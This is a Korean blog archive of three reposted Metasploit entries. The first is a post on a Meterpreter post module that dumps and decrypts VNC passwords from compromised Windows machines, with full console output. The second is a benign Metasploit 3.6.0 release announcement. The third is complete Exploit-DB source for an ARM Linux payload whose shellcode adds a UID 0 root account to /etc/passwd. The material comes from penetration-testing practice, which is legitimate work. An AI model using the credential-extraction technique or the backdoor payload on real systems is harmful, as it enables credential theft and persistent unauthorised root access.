'metasploit'에 해당되는 글 17건

  1. 2011.03.21 Metasploit VNC Password Extraction
  2. 2011.03.08 Metasploit Framework 3.6.0 Released!
  3. 2010.12.09 Create a New User with UID 0 - ARM (Meta)
2011. 3. 21. 19:36

Metasploit VNC Password Extraction

Chris Gates wrote a blog post about the 'getvncpw' meterpreter script. I ran into the same issue on Penetration Tests in the past but didn't know much about the wacked out version of DES that RFB (the VNC protocol) was using. Not being a fan of manually editing a binary and compiling each time I had a password to crack I wanted to find another way, but didn't get a chance to.

Yesterday I saw this ticket: https://www.metasploit.com/redmine/issues/3183 and thought to myself: "Thats definitely within my coding ability to contribute a patch for". After almost 15 hours of coding between 9 pm on Saturday and 8 pm on Sunday. It went far and beyond just adding in a bit of code to support UltraVNC.

changelog:

  • Complete rewrite as a post module instead of a meterpreter script
  • Passwords of less than 8 characters are correctly padded (thanks jduck)
  • UltraVNC checks added
  • TightVNC checks added for both VNC and it's control console
  • Made it very simple to add new checks in either the registry or in a file
  • Output is a bit more verbose (lets you know something is happening
  • Reports authentication credentials found to database
  • Identifies the port that VNC is running on as well

It isn't in the metasploit trunk so until/if if gets added you can get it here:

http://www.room362.com/scripts-and-programs/metasploit/enum_vnc_pw.rb

If you have a check, find it breaks for some reason or another, or just want to tell me that I suck, please leave a comment or email me.

Here it is in action against my VM with 3 different VNC servers on it (calling the post module in two separate ways) :

 

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: XPBASELINE\Administrator
meterpreter > background
msf exploit(handler) > use post/windows/gather/enum_vnc_pw 
msf post(enum_vnc_pw) > set SESSION 1
SESSION => 1
msf post(enum_vnc_pw) > show options

Module options (post/windows/gather/enum_vnc_pw):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

msf post(enum_vnc_pw) > run

[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
[*] Post module execution completed

msf post(enum_vnc_pw) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run post/windows/gather/enum_vnc_pw 

[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
meterpreter > 


출처 : http://www.room362.com/

Trackback 1 Comment 0
2011. 3. 8. 14:43

Metasploit Framework 3.6.0 Released!


In coordination with Metasploit Express and Metasploit Pro, version 3.6 of the Metasploit Framework is now available. Hot on the heels of 3.5.2, this release comes with 8 new exploits and 12 new auxiliaries. A whopping 10 of those new auxiliary modules are Chris John Riley's foray into SAP, giving you the ability to extract a range of information from servers' management consoles via the SOAP interface. This release fixes an annoying installer bug on Linux where Postgres would not automatically start on reboot.

The feature I am most excited about is the new Post Exploitation support. I hinted at this new module type in the 3.5.2 release announcement and with 3.6, more than 20 new modules are available. Post modules are a new, more powerful, replacement for meterpreter scripts. Scripts were clearly tied to a single platform: meterpreter for Windows. With modules it is much easier to abstract common tasks into libraries for any platform that can expose a session. For example, file operations are common across all platforms -- windows/meterpreter, windows/shell, linux/shell, etc. Post modules can simply include Post::File and have access to platform-agnostic methods for interacting with the file system. In the near future, this sort of abstraction will be extended to Windows registry manipulation and service control.

Too much generality can make it difficult to access OS-level features and when you really need to get down and dirty with a session, you still can. Post modules have a Session object exactly as meterpreter scripts did and you can still access all of the low-level methods available to it. That means you can use railgun for performing complex system manipulation (e.g. smartlocker) when necessary. A major benefit of Post modules is the ability to easily include other mixins from the framework. From a user's perspective, this means more consistent reporting and option handling than are currently available with scripts. This also opens the door to local exploits for a variety of platforms, including Windows, Linux, and even Cisco IOS through SSH and Telnet sessions.

Although post modules are meant to replace meterpreter scripts, scripts are not going away any time soon. We understand that many users still rely on private scripts for their post-exploitation needs and porting all of them to the new format will take time. So while we will be favoring module contributions over scripts, that doesn't mean your private code is suddenly going to stop working.

This is an exciting release. As always, it is immediately available from the
Metasploit Framework downloads page.

다운로드 : http://www.metasploit.com/framework/download/

Trackback 1 Comment 0
2010. 12. 9. 18:41

Create a New User with UID 0 - ARM (Meta)

# Exploit Title: Linux/ARM - Create a new user with UID 0 (MSF) # Date: 2010-11-25 # Author: Jonathan Salwan - twitter @shell_storm # Tested on: ARM926EJ-S rev 5 (v5l) # Issue link: https://metasploit.com/redmine/issues/3254 ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' ### # # AddUser # ------- # # Adds a UID 0 user to /etc/passwd. # ### module Metasploit3 include Msf::Payload::Single include Msf::Payload::Linux def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Add User', 'Version' => '???', 'Description' => 'Create a new user with UID 0', 'Author' => [ 'Jonathan Salwan' ], 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'Privileged' => true)) # Register adduser options register_options( [ OptString.new('USER', [ true, "The username to create", "metasploit" ]), OptString.new('PASS', [ true, "The password for this user", "metasploit" ]), OptString.new('SHELL', [ false, "The shell for this user", "/bin/sh" ]), ], self.class) end # # Dynamically builds the adduser payload based on the user's options. # def generate_stage user = datastore['USER'] || 'metasploit' pass = datastore['PASS'] || 'metasploit' shell = datastore['SHELL'] || '/bin/sh' str = "#{user}:#{pass.crypt('Az')}:0:0::/:#{shell}\n" strl1 = [ (str.length)+52 ].pack('C*') strl2 = [ str.length ].pack('C*') pwdir = "/etc/passwd" payload = "\x05\x50\x45\xe0\x01\x50\x8f\xe2\x15\xff\x2f\xe1" + "\x78\x46"+ strl1 + "\x30\xff\x21\xff\x31\xff\x31" + "\xff\x31\x45\x31\xdc\x22\xc8\x32\x05\x27\x01\xdf" + "\x80\x46\x41\x46\x08\x1c\x79\x46\x18\x31\xc0\x46" + strl2 + "\x22\x04\x27\x01\xdf\x41\x46\x08\x1c\x06" + "\x27\x01\xdf\x1a\x49\x08\x1c\x01\x27\x01\xdf" + str + pwdir end end
출처 : Exploit-db

Trackback 0 Comment 0